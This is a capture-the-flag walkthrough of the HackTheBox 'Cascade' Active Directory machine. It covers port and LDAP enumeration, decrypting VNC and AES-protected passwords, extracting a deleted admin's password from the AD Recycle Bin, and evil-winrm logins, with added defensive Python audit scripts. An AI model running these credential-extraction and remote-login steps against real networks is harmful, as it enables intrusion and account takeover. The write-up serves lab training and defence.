Cascade on HackTheBox

Before all

Victim’s IP : 10.10.10.103
Victim’s Host : *.cascade.local
Attacker’s IP : 10.10.14.14

RECON

port scan

Command

rustscan -a 10.10.10.182 --ulimit 5000 -- -sC -sV -Pn --script vuln

Result

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-01 02:10:52Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51409/tcp): CLEAN (Timeout)
| Check 2 (port 15990/tcp): CLEAN (Timeout)
| Check 3 (port 10882/udp): CLEAN (Timeout)
| Check 4 (port 42035/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-01T02:11:47
|_ start_date: 2025-01-01T02:03:54

As usual, the common AD ports are open: LDAP, SMB, Kerberos and Windows RPC.
This also gives us the domain name, cascade.local.

smb enumeration

Command

enum4linux -a 10.10.10.182

Result
A lot of output, including a user list:

user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

Using an LDAP bind:
Command

ldapsearch -x -LLL -H ldap://10.10.10.182 -D 'dc=cascade,dc=local' -b "dc=cascade,dc=local" > ldaplog

Result
Notice that r.thompson's password has leaked:

[image]

After base64 decoding: rY4n5eva
These credentials log in successfully!

Exploit

The opening move, as usual, is BloodHound, but it is not much use for now...
Command

bloodhound-python -c All -u 'r.thompson' -p 'rY4n5eva' -d CASCADE.LOCAL -ns 10.10.10.182 --zip

smb enumeration

First, run crackmapexec to pull down files:

crackmapexec smb 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva'  -M spider_plus -o READ_ONLY=true

Found ./Data/IT/Temp/s.smith/VNC Install.reg, which looks like it contains password information:

... a lot of stuff
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
... a lot of stuff

Refer to this article to recover the plaintext:
https://github.com/frizb/PasswordDecrypts
Command

echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Result

00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008
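As an added example (not part of the original write-up), the Python below scans a Windows registry export (.reg) for VNC password values and, where pycryptodome is installed, recovers the stored value with the same DES-CBC operation as the openssl command above. The point for a defender is that a file like VNC Install.reg left on a readable share is equivalent to a plaintext credential, because the DES key is fixed and public. The sample registry fragment and its key path are constructed; the "Password"=hex value is the one from the write-up.

```python
import re
from typing import List, Optional

# Constructed sample: a fragment in the shape of a Windows registry export
# (.reg) for a VNC server. The key path is an assumed example; the
# "Password"=hex value is the one found in "VNC Install.reg" in the write-up.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
'''

# Fixed DES key used by VNC password storage (the -K value in the openssl
# command above). Because it is public, the stored value is not a secret.
VNC_DES_KEY = bytes.fromhex("e84ad660c4721ae0")

KEY_LINE = re.compile(r"^\[(?P<path>[^\]]+)\]$")
HEX_VALUE = re.compile(r'^"(?P<name>[^"]+)"=hex(?:\(\d+\))?:(?P<data>.*)$')


def _logical_lines(text: str):
    """Yield .reg lines with backslash continuations (wrapped hex data) joined."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        yield buf + line
        buf = ""
    if buf:
        yield buf


def find_vnc_password_values(reg_text: str) -> List[dict]:
    """Return every hex 'Password*' value stored under a key whose path mentions VNC."""
    findings = []
    current_key = ""
    for line in _logical_lines(reg_text):
        m = KEY_LINE.match(line)
        if m:
            current_key = m.group("path")
            continue
        m = HEX_VALUE.match(line)
        if not m or "vnc" not in current_key.lower():
            continue
        if not re.search(r"passw", m.group("name"), re.IGNORECASE):
            continue
        data = bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", m.group("data")))
        findings.append({"key": current_key, "value": m.group("name"), "data": data})
    return findings


def decrypt_vnc_password(data: bytes) -> Optional[str]:
    """Recover the stored password (DES-CBC, zero IV, no padding).

    Returns None when the value is too short or pycryptodome is not installed,
    so the scanner still reports the exposure without it.
    """
    if len(data) < 8:
        return None
    try:
        from Crypto.Cipher import DES  # pycryptodome
    except ImportError:
        return None
    cipher = DES.new(VNC_DES_KEY, DES.MODE_CBC, iv=bytes(8))
    plain = cipher.decrypt(data[:8])  # VNC keeps at most 8 password bytes
    return plain.rstrip(b"\x00").decode("latin-1")


def audit_reg_export(reg_text: str) -> List[dict]:
    """Scan a .reg export and attach the recovered password to each finding."""
    return [dict(f, password=decrypt_vnc_password(f["data"]))
            for f in find_vnc_password_values(reg_text)]


if __name__ == "__main__":
    for f in audit_reg_export(SAMPLE_REG):
        shown = f["password"] if f["password"] is not None else "(install pycryptodome to recover)"
        print(f'{f["key"]} -> {f["value"]}: {f["data"].hex()} -> {shown}')
```

Run it over every .reg file found during a share review; any hit is a credential that should be rotated and removed from the share, whether or not the decryption step ran.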

This gives us s.smith's credentials; evil-winrm login also works.
Command

evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

reversing

Pull the files again with the new credentials:

crackmapexec smb 10.10.10.182 -u 's.smith' -p 'sT333ve2'  -M spider_plus -o READ_ONLY=true

Notice the Audit$ share:

.
├── Audit$
│   ├── CascAudit.exe
│   ├── CascCrypto.dll
│   ├── DB
│   │   └── Audit.db
│   └── RunAudit.bat

Opening Audit.db yields a base64-encoded password, but it is encrypted:
[image]
Decompiling CascAudit.exe with dnSpy reveals the key:
[image]
Decompiling CascCrypto.dll gives the IV and shows that the cipher mode is CBC:
[image]

from Crypto.Cipher import AES          # pycryptodome
from Crypto.Util.Padding import unpad
import base64

# Key recovered from CascAudit.exe; IV from CascCrypto.dll (both hard-coded in the binaries)
key = b'c4scadek3y654321'
iv = b'1tdyjCbY1Ix49842'

# Base64 value read from Audit.db
ciphertext_base64 = "BQO5l5Kj9MdErXx6Q6AGOw=="
ciphertext = base64.b64decode(ciphertext_base64)

# AES-CBC; strip the PKCS#7 padding properly instead of trusting the last byte blindly
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = unpad(cipher.decrypt(ciphertext), AES.block_size)
print(plaintext.decode())

Decrypting gives the password: w3lc0meFr31nd, which logs in as ArkSvc.

Abusing AD Recycle Bin

[image]
Notice that ArkSvc is in the AD Recycle Bin group; reference: https://github.com/ivanversluis/pentest-hacktricks/blob/master/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md#ad-recycle-bin

First connect with evil-winrm:

evil-winrm -i 10.10.10.182 -u arksvc -p 'w3lc0meFr31nd'

Run inside the shell:

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

Notice this section:

accountExpires                  : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin

Another LegacyPwd; decoding it yields the Administrator password.
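As an added example, not from the original write-up: the leaked r.thompson value in the ldapsearch dump and the TempAdmin entry in the Recycle Bin are the same weakness, a custom attribute (cascadeLegacyPwd) holding a base64-encoded password, which survives deletion when the AD Recycle Bin is enabled, as the TempAdmin object shows. The Python below parses LDIF as produced by ldapsearch -LLL, flags password-like attributes that are not part of the normal AD schema, and decodes any whose value is base64 of printable text. The sample LDIF is constructed (the DNs, the s.smith entry, and the base64 form of the r.thompson password); the TempAdmin DEL GUID and attribute value are the ones shown above.

```python
import base64
import binascii
import re
from typing import List

# Constructed sample in the shape of `ldapsearch -x -LLL` (LDIF) output.
# The TempAdmin entry (deleted object, DEL GUID and cascadeLegacyPwd value)
# mirrors the write-up; the r.thompson value is the write-up's password,
# base64-encoded here for the example; DNs and the s.smith entry are constructed.
SAMPLE_LDIF = """dn: CN=r.thompson,OU=Users,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
badPwdCount: 0
badPasswordTime: 0
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=TempAdmin\\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
objectClass: user
isDeleted: TRUE
sAMAccountName: TempAdmin
cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz

dn: CN=s.smith,OU=Users,DC=cascade,DC=local
objectClass: user
sAMAccountName: s.smith
badPwdCount: 0
"""

# Password-related attribute names from the normal AD schema that carry
# counters, timestamps or policy, never a secret value.
BENIGN_ATTRS = {
    "badpwdcount", "badpasswordtime", "pwdlastset", "maxpwdage", "minpwdage",
    "minpwdlength", "pwdhistorylength", "pwdproperties", "lockoutthreshold",
}
SUSPICIOUS = re.compile(r"pwd|pass|secret|cred", re.IGNORECASE)


def parse_ldif(text: str) -> List[dict]:
    """Minimal LDIF parser: one dict per entry, attribute -> list of values."""
    entries, lines = [], []  # lines: [attr, is_base64, value] for the current entry

    def flush():
        if not lines:
            return
        entry = {}
        for attr, is_b64, value in lines:
            if is_b64:  # "attr:: <base64>" form used for values that are not LDIF-safe
                value = base64.b64decode(value).decode("utf-8", "replace")
            entry.setdefault(attr, []).append(value)
        entries.append(entry)
        lines.clear()

    for raw in text.splitlines() + [""]:
        if raw.startswith("#"):
            continue
        if raw == "":
            flush()
            continue
        if raw.startswith(" ") and lines:  # folded continuation of the previous value
            lines[-1][2] += raw[1:]
            continue
        attr, _, rest = raw.partition(":")
        is_b64 = rest.startswith(":")
        lines.append([attr, is_b64, (rest[1:] if is_b64 else rest).strip()])
    return entries


def _base64_text(value: str):
    """Return the decoded string if value is base64 of printable text, else None."""
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return decoded if decoded and decoded.isprintable() else None


def audit_ldif(text: str) -> List[dict]:
    """Flag non-schema password-like attributes, decoding base64 where it yields text."""
    findings = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", [""])[0]
        deleted = entry.get("isDeleted", [""])[0].upper() == "TRUE"
        for attr, values in entry.items():
            if attr.lower() in BENIGN_ATTRS or not SUSPICIOUS.search(attr):
                continue
            for value in values:
                findings.append({"dn": dn, "attribute": attr, "raw": value,
                                 "decoded": _base64_text(value), "deleted": deleted})
    return findings


if __name__ == "__main__":
    for f in audit_ldif(SAMPLE_LDIF):
        state = "DELETED" if f["deleted"] else "live"
        print(f'{state:7} {f["dn"]}: {f["attribute"]} = {f["raw"]} -> {f["decoded"]}')
```

The same audit applies to an LDIF export of the Deleted Objects container: an attribute like this must be cleared on live objects and the tombstoned objects purged, or the credential remains readable to anyone allowed to view deleted objects.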

Finally

evil-winrm -i 10.10.10.182 -u administrator -p 'baCT3r1aN00dles'

PWNED!!

After all

Almost done with the AD-101 path zzz
I have a midterm tomorrow, so I'm off to study first